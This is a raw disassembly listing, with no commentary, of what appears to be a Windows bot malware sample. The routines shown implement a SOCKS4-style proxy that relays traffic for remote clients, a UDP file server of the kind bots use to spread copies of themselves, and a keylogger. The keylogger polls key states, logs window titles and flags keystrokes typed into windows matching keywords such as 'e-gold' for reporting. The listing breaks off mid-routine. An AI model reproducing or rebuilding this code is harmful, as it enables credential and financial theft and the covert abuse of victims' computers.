sub_411AAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411BCE proc near ; DATA XREF: sub_401ACD+2BC4�o
Source = byte ptr -2D4h
var_D4 = dword ptr -0D4h
Str = byte ptr -0D0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
Dst = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 10h
mov esi, eax
pop ebx
lea edi, [ebp+var_D4]
push 2Ch
mov [ebp+var_4], ebx
pop ecx
rep movsd
push 1
xor esi, esi
pop edi
mov [eax+0A8h], edi
push ebx ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_40]
call dword_4CB9D4 ; htons
push 6
push edi
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], esi
call dword_4CBA54 ; socket
mov edi, eax
mov eax, [ebp+var_3C]
imul eax, 234h
push ebx
mov dword_43E91C[eax], edi
lea eax, [ebp+Dst]
push eax
push edi
call dword_4CBA00 ; bind
test eax, eax
jnz loc_411D70
push 0Ah
push edi
call dword_4CB9FC ; listen
test eax, eax
jnz loc_411D70
push [ebp+var_40]
push [ebp+var_D4]
call sub_40AA06
pop ecx
push eax
lea eax, [ebp+Source]
push offset asc_42BC94 ; "-"
push eax ; Dest
call _sprintf
add esp, 10h
cmp [ebp+var_30], esi
jnz short loc_411CA9
push esi ; int
lea eax, [ebp+Source]
push [ebp+var_34] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_D4] ; int
call sub_409869
add esp, 14h
loc_411CA9: ; CODE XREF: sub_411BCE+B9�j
; sub_411BCE+172�j ...
lea eax, [ebp+Source]
push eax
call sub_415D38
pop ecx
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push edi
call dword_4CBA68 ; accept
push [ebp+var_3C]
mov ebx, eax
movzx eax, [ebp+var_22]
push eax
mov [ebp+var_28], esi
push [ebp+var_20]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+Source]
push offset asc_435730 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 19h ; int
push eax ; Source
call sub_40B3BA
mov [ebp+var_38], eax
imul eax, 234h
mov ecx, [ebp+var_3C]
add esp, 20h
mov dword_43E914[eax], ecx
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_D4]
push esi
push eax
push offset sub_411DD3
push esi
push esi
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov dword_43E924[ecx], eax
jz short loc_411D50
loc_411D3D: ; CODE XREF: sub_411BCE+180�j
cmp [ebp+var_28], esi
jnz loc_411CA9
push 5
call ds:dword_427080 ; Sleep
jmp short loc_411D3D
; ---------------------------------------------------------------------------
loc_411D50: ; CODE XREF: sub_411BCE+16D�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_4356F4 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_411CA9
; ---------------------------------------------------------------------------
loc_411D70: ; CODE XREF: sub_411BCE+7B�j
; sub_411BCE+8C�j
push edi
call dword_4CBA6C ; closesocket
push [ebp+var_40]
lea eax, [ebp+Source]
push offset asc_4356C0 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_411DB3
push esi ; int
lea eax, [ebp+Source]
push [ebp+var_34] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_D4] ; int
call sub_409869
add esp, 14h
loc_411DB3: ; CODE XREF: sub_411BCE+1C3�j
lea eax, [ebp+Source]
push eax
call sub_415D38
push [ebp+var_3C]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
pop ebx
sub_411BCE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411DD3 proc near ; DATA XREF: sub_411BCE+14F�o
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_4D0 = byte ptr -4D0h
var_4CF = byte ptr -4CFh
var_4CE = word ptr -4CEh
var_4CC = dword ptr -4CCh
Dst = byte ptr -4C8h
var_C8 = byte ptr -0C8h
Str2 = byte ptr -44h
var_2C = dword ptr -2Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 2Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_C8]
rep movsd
mov esi, [ebp+var_2C]
push 1
mov [ebp+arg_0], esi
imul esi, 234h
pop edi
lea esi, dword_43E91C[esi]
mov [eax+0ACh], edi
xor ebx, ebx
mov eax, [esi]
mov [ebp+var_8], 5
mov [ebp+var_5D0], eax
lea eax, [ebp+var_8]
push eax
push ebx
lea eax, [ebp+var_5D4]
push ebx
push eax
push ebx
mov [ebp+var_4], ebx
mov [ebp+var_5D4], edi
call dword_4CB9BC ; select
test eax, eax
jnz short loc_411E54
push dword ptr [esi]
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_411E54: ; CODE XREF: sub_411DD3+67�j
push ebx
lea eax, [ebp+var_4D0]
push 408h
push eax
push dword ptr [esi]
call dword_4CB9EC ; recv
test eax, eax
jg short loc_411E85
push dword ptr [esi]
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_411E85: ; CODE XREF: sub_411DD3+98�j
cmp [ebp+var_4D0], 4
jnz loc_41207F
cmp [ebp+var_4CF], 1
jnz loc_41207F
cmp [ebp+Str2], bl
jz short loc_411F1B
lea eax, [ebp+Str2]
push eax ; Str2
lea eax, [ebp+Dst]
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_411F1B
lea eax, [ebp+Str2]
push eax
lea eax, [ebp+Dst]
push eax ; Args
push offset dword_4357F8 ; Format
call sub_415DAC
push 400h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Dh
call _memset
add esp, 18h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_4CBA24 ; send
push dword ptr [esi]
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_411F1B: ; CODE XREF: sub_411DD3+CF�j
; sub_411DD3+E5�j
push 10h ; Size
lea eax, [ebp+var_18]
push ebx ; Val
push eax ; Dst
call _memset
mov ax, [ebp+var_4CE]
add esp, 0Ch
mov [ebp+var_16], ax
mov eax, [ebp+var_4CC]
push 6
push edi
push 2
mov [ebp+var_18], 2
mov [ebp+var_14], eax
call dword_4CBA54 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_411FB3
call dword_4CB968 ; WSAGetLastError
push eax ; Args
push offset dword_4357B8 ; Format
call sub_415DAC
push 400h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call _memset
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_4CBA24 ; send
push dword ptr [esi]
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_411FB3: ; CODE XREF: sub_411DD3+181�j
lea eax, [ebp+var_18]
push 10h
push eax
push edi
call dword_4CB97C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_412022
call dword_4CB968 ; WSAGetLastError
push eax ; Args
push offset dword_435774 ; Format
call sub_415DAC
push 400h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call _memset
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_4CBA24 ; send
push dword ptr [esi]
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_412022: ; CODE XREF: sub_411DD3+1F0�j
push 400h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Ah
call _memset
add esp, 0Ch
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_4CBA24 ; send
push dword ptr [esi]
push edi
call sub_412097
pop ecx
pop ecx
push edi
call dword_4CBA6C ; closesocket
push dword ptr [esi]
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_41207F: ; CODE XREF: sub_411DD3+B9�j
; sub_411DD3+C6�j
push dword ptr [esi]
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
sub_411DD3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412097 proc near ; CODE XREF: sub_411DD3+286�p
Dst = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
mov esi, 400h
loc_4120AD: ; CODE XREF: sub_412097+C5�j
; sub_412097+F5�j
mov [ebp+var_100], ebx
mov [ebp+var_104], 1
xor ecx, ecx
lea eax, [ebp+var_100]
loc_4120C5: ; CODE XREF: sub_412097+3C�j
mov edx, [ebp+arg_0]
cmp [eax], edx
jz short loc_4120D5
inc ecx
add eax, 4
cmp ecx, 1
jb short loc_4120C5
loc_4120D5: ; CODE XREF: sub_412097+33�j
cmp ecx, 1
jnz short loc_4120EA
mov [ebp+var_FC], edx
mov [ebp+var_104], 2
loc_4120EA: ; CODE XREF: sub_412097+41�j
push esi ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_104]
push edi
push edi
push edi
push eax
push edi
call dword_4CB9BC ; select
lea eax, [ebp+var_104]
push eax
push ebx
call dword_4CB8C0 ; __WSAFDIsSet
test eax, eax
jz short loc_41214A
push edi
lea eax, [ebp+Dst]
push esi
push eax
push ebx
call dword_4CB9EC ; recv
cmp eax, 0FFFFFFFFh
jz short loc_412192
push edi
push eax
lea eax, [ebp+Dst]
push eax
push [ebp+arg_0]
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz short loc_412192
loc_41214A: ; CODE XREF: sub_412097+85�j
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call dword_4CB8C0 ; __WSAFDIsSet
test eax, eax
jz loc_4120AD
push edi
lea eax, [ebp+Dst]
push esi
push eax
push [ebp+arg_0]
call dword_4CB9EC ; recv
cmp eax, 0FFFFFFFFh
jz short loc_412192
push edi
push eax
lea eax, [ebp+Dst]
push eax
push ebx
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jnz loc_4120AD
loc_412192: ; CODE XREF: sub_412097+9A�j
; sub_412097+B1�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_412097 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412197 proc near ; CODE XREF: sub_412197:loc_4125F0�p
; DATA XREF: sub_401ACD+20B3�o ...
var_87C = dword ptr -87Ch
var_878 = dword ptr -878h
var_778 = dword ptr -778h
var_578 = byte ptr -578h
var_577 = byte ptr -577h
var_576 = byte ptr -576h
var_575 = byte ptr -575h
DstBuf = byte ptr -574h
var_374 = dword ptr -374h
Filename = byte ptr -370h
Str = byte ptr -26Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_160 = dword ptr -160h
var_15C = byte ptr -15Ch
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D0 = byte ptr -0D0h
var_CF = byte ptr -0CFh
var_CE = byte ptr -0CEh
var_CD = byte ptr -0CDh
Dest = byte ptr -50h
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
Dst = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
File = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 87Ch
mov edx, [ebp+arg_0]
push ebx
push esi
push edi
push 1
xor ebx, ebx
pop eax
mov ecx, 0A9h
mov esi, edx
lea edi, [ebp+var_374]
push ebx
push 2
rep movsd
inc [ebp+var_164]
push 2
mov [ebp+var_10], eax
mov [ebp+var_14], eax
mov [ebp+var_8], eax
mov [edx+2A0h], eax
call dword_4CBA54 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_412237
push 190h
call ds:dword_427080 ; Sleep
cmp [ebp+var_D8], ebx
jnz short loc_412217
push ebx ; int
lea eax, [ebp+var_778]
push [ebp+var_DC] ; int
push eax ; int
lea eax, [ebp+var_15C]
push eax ; Str
push [ebp+var_374] ; int
call sub_409869
add esp, 14h
loc_412217: ; CODE XREF: sub_412197+5B�j
lea eax, [ebp+var_778]
push eax
call sub_415D38
push [ebp+var_168]
call sub_40B6D6
pop ecx
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_412237: ; CODE XREF: sub_412197+48�j
lea eax, [ebp+var_10]
push 4
push eax
mov edi, 0FFFFh
push 4
push edi
push esi
call dword_4CB9B4 ; setsockopt
lea eax, [ebp+var_14]
push 4
push eax
push 0FFFFFFFBh
push edi
push esi
call dword_4CB9B4 ; setsockopt
mov eax, [ebp+var_168]
push 10h ; Size
imul eax, 234h
push ebx ; Val
mov dword_43E91C[eax], esi
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_160]
call dword_4CB9D4 ; htons
mov [ebp+var_2A], ax
lea eax, [ebp+Dst]
push 10h
push eax
push esi
mov [ebp+var_28], ebx
call dword_4CBA00 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_4122C1
push 1388h
call ds:dword_427080 ; Sleep
dec [ebp+var_164]
push [ebp+arg_0]
jmp loc_4125F0
; ---------------------------------------------------------------------------
loc_4122C1: ; CODE XREF: sub_412197+10F�j
lea eax, [ebp+Filename]
push offset aRb ; "rb"
push eax ; Filename
call _fopen
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+File], eax
jnz short loc_412327
push 190h
call ds:dword_427080 ; Sleep
push ebx ; int
lea eax, [ebp+var_778]
push [ebp+var_DC] ; int
push eax ; int
lea eax, [ebp+var_15C]
push eax ; Str
push [ebp+var_374] ; int
call sub_409869
lea eax, [ebp+var_778]
push eax
call sub_415D38
push [ebp+var_168]
call sub_40B6D6
add esp, 1Ch
push ebx
call ds:dword_4270D4 ; ExitThread
loc_412327: ; CODE XREF: sub_412197+142�j
; sub_412197+413�j
mov edi, [ebp+arg_0]
cmp [edi+2A0h], ebx
jz loc_4125B3
mov edi, 80h
lea eax, [ebp+var_D0]
push edi ; Size
push ebx ; Val
push eax ; Dst
mov [ebp+var_1C], 5
mov [ebp+var_18], 1388h
mov [ebp+var_878], esi
mov [ebp+var_87C], 1
call _memset
add esp, 0Ch
lea eax, [ebp+var_1C]
push eax
push ebx
lea eax, [ebp+var_87C]
push ebx
push eax
push ebx
call dword_4CB9BC ; select
test eax, eax
jle loc_4125A7
mov al, byte_43DB88
mov ecx, edi
mov [ebp+var_578], al
xor eax, eax
lea edi, [ebp+var_577]
mov [ebp+var_C], 10h
rep stosd
stosw
stosb
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_3C]
push eax
push ebx
lea eax, [ebp+var_D0]
push 80h
push eax
push esi
call dword_4CB9AC ; recvfrom
push [ebp+var_38]
mov [ebp+var_8], eax
call dword_4CBA60 ; inet_ntoa
push eax ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
cmp [ebp+var_D0], bl
pop ecx
pop ecx
jnz loc_412591
cmp [ebp+var_CF], 1
jnz loc_412497
lea eax, [ebp+Str]
push eax ; Str
call _strlen
push ebx ; Origin
push ebx ; Offset
push [ebp+File] ; File
call _fseek
push [ebp+File] ; File
lea eax, [ebp+DstBuf]
mov [ebp+var_578], bl
mov [ebp+var_577], 3
push 200h ; Count
push 1 ; ElementSize
push eax ; DstBuf
mov [ebp+var_576], bl
mov [ebp+var_575], 1
call _fread
add esp, 20h
lea ecx, [ebp+var_3C]
mov [ebp+var_8], eax
add eax, 4
push [ebp+var_C]
push ecx
push ebx
push eax
lea eax, [ebp+var_578]
push eax
push esi
call dword_4CBA38 ; sendto
cmp [ebp+var_D8], ebx
jnz short loc_412485
push ebx ; int
lea eax, [ebp+var_778]
push [ebp+var_DC] ; int
push eax ; int
lea eax, [ebp+var_15C]
push eax ; Str
push [ebp+var_374] ; int
call sub_409869
add esp, 14h
loc_412485: ; CODE XREF: sub_412197+2C9�j
lea eax, [ebp+var_778]
push eax
call sub_415D38
pop ecx
jmp loc_4125A7
; ---------------------------------------------------------------------------
loc_412497: ; CODE XREF: sub_412197+257�j
cmp [ebp+var_CF], 4
jnz loc_412591
mov cl, [ebp+var_CD]
mov al, [ebp+var_CE]
cmp cl, 0FFh
mov [ebp+var_578], bl
mov [ebp+var_577], 3
jnz short loc_4124D4
inc al
xor cl, cl
mov [ebp+var_576], al
mov [ebp+var_575], bl
jmp short loc_4124E2
; ---------------------------------------------------------------------------
loc_4124D4: ; CODE XREF: sub_412197+329�j
inc cl
mov [ebp+var_576], al
mov [ebp+var_575], cl
loc_4124E2: ; CODE XREF: sub_412197+33B�j
movzx eax, al
movzx ecx, cl
shl eax, 8
add eax, ecx
mov edi, 200h
shl eax, 9
sub eax, edi
push ebx ; Origin
push eax ; Offset
push [ebp+File] ; File
call _fseek
push [ebp+File] ; File
lea eax, [ebp+DstBuf]
push edi ; Count
push 1 ; ElementSize
push eax ; DstBuf
call _fread
add esp, 1Ch
mov edi, eax
lea eax, [ebp+var_3C]
mov [ebp+var_8], edi
push [ebp+var_C]
push eax
lea eax, [edi+4]
push ebx
push eax
lea eax, [ebp+var_578]
push eax
push esi
call dword_4CBA38 ; sendto
cmp edi, ebx
jnz short loc_4125A7
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_778]
push offset dword_434798 ; Format
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_D8], ebx
jnz short loc_41257C
push ebx ; int
lea eax, [ebp+var_778]
push [ebp+var_DC] ; int
push eax ; int
lea eax, [ebp+var_15C]
push eax ; Str
push [ebp+var_374] ; int
call sub_409869
add esp, 14h
loc_41257C: ; CODE XREF: sub_412197+3C0�j
lea eax, [ebp+var_778]
push eax
call sub_415D38
inc dword_4CE4DC
pop ecx
jmp short loc_4125A7
; ---------------------------------------------------------------------------
loc_412591: ; CODE XREF: sub_412197+24A�j
; sub_412197+307�j
push [ebp+var_C]
lea eax, [ebp+var_3C]
push eax
push ebx
push 9
push offset dword_435838
push esi
call dword_4CBA38 ; sendto
loc_4125A7: ; CODE XREF: sub_412197+1E9�j
; sub_412197+2FB�j ...
cmp [ebp+var_8], ebx
jg loc_412327
mov edi, [ebp+arg_0]
loc_4125B3: ; CODE XREF: sub_412197+199�j
push esi
call dword_4CBA6C ; closesocket
push [ebp+File] ; File
call _fclose
dec [ebp+var_164]
cmp [edi+2A0h], ebx
pop ecx
jnz short loc_4125E4
push [ebp+var_168]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_4125E4: ; CODE XREF: sub_412197+438�j
push 3E8h
call ds:dword_427080 ; Sleep
push edi
loc_4125F0: ; CODE XREF: sub_412197+125�j
call sub_412197
pop edi
pop esi
pop ebx
leave
retn 4
sub_412197 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4125FC(int,char *Str,int,int,char,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int)
sub_4125FC proc near ; CODE XREF: sub_4126A7+E2�p
; sub_4126A7+1A4�p ...
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = byte ptr 18h
arg_90 = dword ptr 98h
arg_94 = dword ptr 9Ch
push ebp
mov ebp, esp
sub esp, 200h
cmp [ebp+arg_90], 0
jz short loc_41266C
push esi
mov esi, offset aEGold ; "e-gold"
loc_412614: ; CODE XREF: sub_4125FC+6B�j
push esi ; SubStr
push [ebp+Str] ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_41265B
push esi
lea eax, [ebp+Dest]
push [ebp+arg_0]
push offset aSS_5 ; "%s (%s)"
push 200h ; Count
push eax ; Dest
call __snprintf
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_94] ; int
push eax ; int
lea eax, [ebp+arg_10]
push eax ; Str
push [ebp+arg_8] ; int
call sub_409869
add esp, 28h
loc_41265B: ; CODE XREF: sub_4125FC+25�j
add esi, 80h
cmp esi, offset dword_436448
jb short loc_412614
pop esi
jmp short loc_4126A3
; ---------------------------------------------------------------------------
loc_41266C: ; CODE XREF: sub_4125FC+10�j
push [ebp+arg_0]
lea eax, [ebp+Dest]
push offset aS_6 ; "%s"
push 200h ; Count
push eax ; Dest
call __snprintf
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_94] ; int
push eax ; int
lea eax, [ebp+arg_10]
push eax ; Str
push [ebp+arg_8] ; int
call sub_409869
add esp, 24h
loc_4126A3: ; CODE XREF: sub_4125FC+6E�j
xor eax, eax
leave
retn
sub_4125FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4126A7 proc near ; DATA XREF: sub_401ACD+7374�o
var_920 = dword ptr -920h
var_91C = byte ptr -91Ch
var_520 = byte ptr -520h
Dest = byte ptr -4E0h
var_2E1 = byte ptr -2E1h
Dst = byte ptr -2E0h
var_E0 = byte ptr -0E0h
var_DC = dword ptr -0DCh
var_58 = dword ptr -58h
Str = byte ptr -48h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 920h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
and [ebp+var_920], 0
push 26h
and [ebp+arg_0], 0
pop ecx
mov esi, eax
lea edi, [ebp+var_E0]
rep movsd
mov dword ptr [eax+94h], 1
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_91C]
rep stosd
call dword_4CB958 ; GetForegroundWindow
lea ecx, [ebp+Str]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call dword_4CB970 ; GetWindowTextA
mov ebx, 200h
loc_412702: ; CODE XREF: sub_4126A7+4A0�j
push 8
call ds:dword_427080 ; Sleep
call dword_4CB958 ; GetForegroundWindow
cmp eax, [ebp+var_8]
jz loc_41287A
lea ecx, [ebp+Str]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call dword_4CB970 ; GetWindowTextA
cmp [ebp+var_58], 0
jz loc_4127FF
lea eax, [ebp+Dst]
push eax ; Str
call _strlen
test eax, eax
pop ecx
jbe short loc_4127B8
lea eax, [ebp+Str]
push eax ; Str
call _strlen
cmp eax, 1
pop ecx
jnb short loc_4127B8
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+Dest]
push offset a__S_l_ ; ".».%s.«."
push eax ; int
call _sprintf
sub esp, 8Ch
lea eax, [ebp+Str]
lea esi, [ebp+var_E0]
push 26h
pop ecx
mov edi, esp
push eax ; Str
lea eax, [ebp+Dest]
rep movsd
push eax ; int
call sub_4125FC
mov [ebp+arg_0], eax
push ebx ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0ACh
lea eax, [ebp+Dest]
push ebx ; Size
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
loc_4127B8: ; CODE XREF: sub_4126A7+9B�j
; sub_4126A7+AA�j
lea eax, [ebp+Dst]
push eax ; Str
call _strlen
test eax, eax
pop ecx
jbe loc_41287A
lea eax, [ebp+Str]
push eax ; Str
call _strlen
test eax, eax
pop ecx
jbe loc_41287A
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+Dest]
push offset a__S_l_ ; ".».%s.«."
push eax ; Dest
call _sprintf
sub esp, 8Ch
jmp short loc_412833
; ---------------------------------------------------------------------------
loc_4127FF: ; CODE XREF: sub_4126A7+86�j
lea eax, [ebp+Str]
push eax ; Str
call _strlen
test eax, eax
pop ecx
jbe loc_412925
lea eax, [ebp+Str]
push eax
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+Dest]
push offset a__S_l_ChangedW ; ".».%s.«. (Changed Windows: %s)"
push eax ; int
call _sprintf
sub esp, 88h
loc_412833: ; CODE XREF: sub_4126A7+156�j
push 26h
lea eax, [ebp+Str]
pop ecx
lea esi, [ebp+var_E0]
mov edi, esp
push eax ; Str
lea eax, [ebp+Dest]
rep movsd
push eax ; int
call sub_4125FC
mov [ebp+arg_0], eax
push ebx ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0ACh
lea eax, [ebp+Dest]
push ebx ; Size
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
loc_41287A: ; CODE XREF: sub_4126A7+6C�j
; sub_4126A7+120�j ...
cmp [ebp+var_58], 0
jz loc_412925
push 1
call dword_4CB9A0 ; GetAsyncKeyState
cmp ax, 8001h
jnz loc_412925
lea eax, [ebp+Dst]
push eax ; Str
call _strlen
test eax, eax
pop ecx
jbe short loc_412925
call dword_4CB958 ; GetForegroundWindow
lea ecx, [ebp+var_520]
push 3Ch
push ecx
push eax
call dword_4CB970 ; GetWindowTextA
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+Dest]
push offset a__S_l_ ; ".».%s.«."
push eax ; int
call _sprintf
sub esp, 8Ch
lea eax, [ebp+var_520]
lea esi, [ebp+var_E0]
push 26h
pop ecx
mov edi, esp
push eax ; Str
lea eax, [ebp+Dest]
rep movsd
push eax ; int
call sub_4125FC
mov [ebp+arg_0], eax
push ebx ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0ACh
lea eax, [ebp+Dest]
push ebx ; Size
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
loc_412925: ; CODE XREF: sub_4126A7+164�j
; sub_4126A7+1D7�j ...
mov [ebp+var_4], offset dword_43644C
loc_41292C: ; CODE XREF: sub_4126A7+496�j
push 10h
call dword_4CB8A8 ; GetKeyState
movsx esi, ax
mov eax, [ebp+var_4]
mov edi, [eax-4]
push edi
call dword_4CB9A0 ; GetAsyncKeyState
test ah, 80h
jz short loc_4129C4
push 14h
call dword_4CB8A8 ; GetKeyState
test ax, ax
jz short loc_412975
cmp esi, 0FFFFFFFFh
jle short loc_412975
cmp edi, 40h
jle short loc_412975
cmp edi, 5Bh
jge short loc_412975
mov [ebp+edi*4+var_920], 1
jmp loc_412B32
; ---------------------------------------------------------------------------
loc_412975: ; CODE XREF: sub_4126A7+2AD�j
; sub_4126A7+2B2�j ...
push 14h
call dword_4CB8A8 ; GetKeyState
test ax, ax
jz short loc_4129A0
test esi, esi
jge short loc_4129B4
cmp edi, 40h
jle short loc_4129A0
cmp edi, 5Bh
jge short loc_4129A0
mov [ebp+edi*4+var_920], 2
jmp loc_412B32
; ---------------------------------------------------------------------------
loc_4129A0: ; CODE XREF: sub_4126A7+2D9�j
; sub_4126A7+2E2�j ...
test esi, esi
jge short loc_4129B4
mov [ebp+edi*4+var_920], 3
jmp loc_412B32
; ---------------------------------------------------------------------------
loc_4129B4: ; CODE XREF: sub_4126A7+2DD�j
; sub_4126A7+2FB�j
mov [ebp+edi*4+var_920], 4
jmp loc_412B32
; ---------------------------------------------------------------------------
loc_4129C4: ; CODE XREF: sub_4126A7+2A0�j
mov esi, [ebp+edi*4+var_920]
lea eax, [ebp+edi*4+var_920]
test esi, esi
jz loc_412B32
and dword ptr [eax], 0
lea eax, [ebp+Dst]
cmp edi, 8
push eax ; Str
jnz short loc_4129FC
call _strlen
and [ebp+eax+var_2E1], 0
pop ecx
jmp loc_412B32
; ---------------------------------------------------------------------------
loc_4129FC: ; CODE XREF: sub_4126A7+340�j
call _strlen
cmp eax, 1B9h
pop ecx
jbe short loc_412A42
call dword_4CB958 ; GetForegroundWindow
lea ecx, [ebp+Str]
push 3Ch
push ecx
push eax
call dword_4CB970 ; GetWindowTextA
cmp [ebp+var_58], 0
jz short loc_412A30
lea eax, [ebp+Dst]
push eax
push offset a__S_l_BufferFu ; ".».%s.«. (Buffer full)"
jmp short loc_412A85
; ---------------------------------------------------------------------------
